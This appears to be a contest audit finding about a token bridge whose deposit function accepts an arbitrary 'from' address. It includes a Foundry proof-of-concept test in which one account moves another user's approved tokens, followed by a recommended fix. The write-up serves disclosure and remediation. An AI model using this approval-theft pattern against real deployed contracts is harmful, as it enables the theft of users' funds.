Submission Details
Severity:
Attacker can remove tokens from users up to the approved allowance
Summary
All tokens that have been approved for spending by the bridge are at risk.
Vulnerability Details
The deposit function takes address from as a parameter, rather than using msg.sender.
Impact
A malicious user can move tokens from other user's wallets, where they have been approved. Unapproved actors can therefore move users funds to the vault. This means they are at risk in the event of an exploit on the bridge.
POC
function testCanUseOthersApprovals() public {
// setup - user approves tokens
uint256 depositAmount = 1e18;
address user2InL2 = makeAddr("userInL2");
vm.startPrank(user);
token.approve(address(tokenBridge), depositAmount);
uint256 userInitialBalance = token.balanceOf(address(user));
// set up - create user 2
address user2 = makeAddr("user2");
// setup - user 2 deposits from user 1 balance
vm.startPrank(user2);
tokenBridge.depositTokensToL2(user, user2InL2, depositAmount);
uint256 userPostBalance = token.balanceOf(address(user));
assert(token.balanceOf(address(user)) < userInitialBalance);
console.log("USER LOSS = ", (userInitialBalance - userPostBalance));
}
Tools Used
Manual review.
Recommendations
Remove from as a parameter in the function and instead pass msg.sender to safeTransferFrom
Updates
Lead Judging Commences
0xnevi over 1 year ago
Submission Judgement Published Assigned finding tags:
depositTokensToL2(): abitrary from address
Rewards breakdown
nSLOC
99This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.